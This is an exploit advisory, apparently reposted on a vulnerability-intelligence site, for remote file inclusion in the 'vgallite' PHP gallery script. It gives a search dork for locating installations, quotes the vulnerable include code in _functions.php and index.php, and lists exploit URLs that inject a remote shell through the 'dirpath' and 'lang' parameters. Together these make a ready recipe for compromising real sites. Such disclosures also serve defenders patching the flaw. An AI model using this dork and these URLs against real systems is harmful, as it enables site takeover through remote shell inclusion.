Discovered vulnerability in vgallite exposes scripts to remote file inclusion attacks.
`Discovred By : Hasadya Raed
----------------------------
Contact : [email protected] , [email protected] , [email protected]
----------------------------
Greetz : Jonathan , Muts
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File:
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".((isset($language))?$language:"english").".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo